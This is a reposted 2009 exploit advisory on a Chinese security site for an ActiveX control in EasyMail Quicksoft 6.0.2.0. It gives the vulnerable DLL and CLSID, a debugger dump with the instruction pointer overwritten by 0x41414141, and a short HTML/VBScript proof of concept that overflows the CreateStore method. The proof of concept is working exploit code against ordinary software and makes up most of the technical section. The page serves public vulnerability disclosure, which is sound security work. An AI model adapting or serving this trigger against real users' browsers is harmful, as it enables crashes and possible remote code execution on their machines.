首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
EasyMail Quicksoft 6.0.2.0 (CreateStore) ActiveX Code Execution PoC
来源:Protek Research Lab's 作者:Provencher 发布时间:2009-09-16  

#####################################################################################

Application:  EasyMail Quicksoft 6.0.2.0
           
Platforms:    Windows XP Professional French SP2

crash:       IE 6.0.2900.2180
      
 
Exploitation: remote Code Execution

Date:         2009-08-24

Author:       Francis Provencher (Protek Research Lab's)
            

#####################################################################################

1) Introduction
2) Technical details and bug
3) The Code

#####################################################################################

===============
1) Introduction
===============

Create, send, download, parse, print and store internet email messages in your classic windows application.  Designed for Visual Basic, ASP, C++, Delphi, ColdFusion, PowerBuilder, Access and other development environments.  COM or standard DLL interfaces.  This is the software that processes hundreds of millions of email messages on the Internet every day.

#####################################################################################

============================
2) Technical details
============================

Name: emmailstore.dll
Ver.: 6.0.2.0
CLSID: {18A76B9A-45C1-11D3-80DC-00C04F6B92D0}

ModLoad: 10000000 1002c000   C:\WINDOWS\system32\emmailstore.dll
(1670.59c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000002bd ebx=00000000 ecx=0003ea80 edx=00030608 esi=00038790 edi=00000193
eip=41414141 esp=0013eb44 ebp=0013eb60 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206
41414141 ??              ???

 

 

#####################################################################################

===========
3) The Code
===========

Proof of concept DoS code;

<HTML>
<object classid='clsid:18A76B9A-45C1-11D3-80DC-00C04F6B92D0' id='target' />
<script language='vbscript'>

argCount   = 2

arg1=String(402, "A")
arg2=1

target.CreateStore arg1 ,arg2

</script>
<html>
~

 

#####################################################################################
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·EasyMail Quicksoft 6.0.2.0 Act
·VLC Media Player < 0.9.6 (CUE)
·Novell Groupwise Client 7.0.3.
·SAP Player 0.9 (.pla) Universa
·linux/x86 shellcode that forks
·MP3 Collector 2.3 (m3u File) L
·linux/x86 shellcode that forks
·BigAnt Server 2.50 GET Request
·HERO SUPER PLAYER 3000 .M3U Fi
·DJ Studio Pro 4.2 (.PLS file)
·BigAnt Server 2.50 GET Request
·Installshield 2009 Premier ver
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved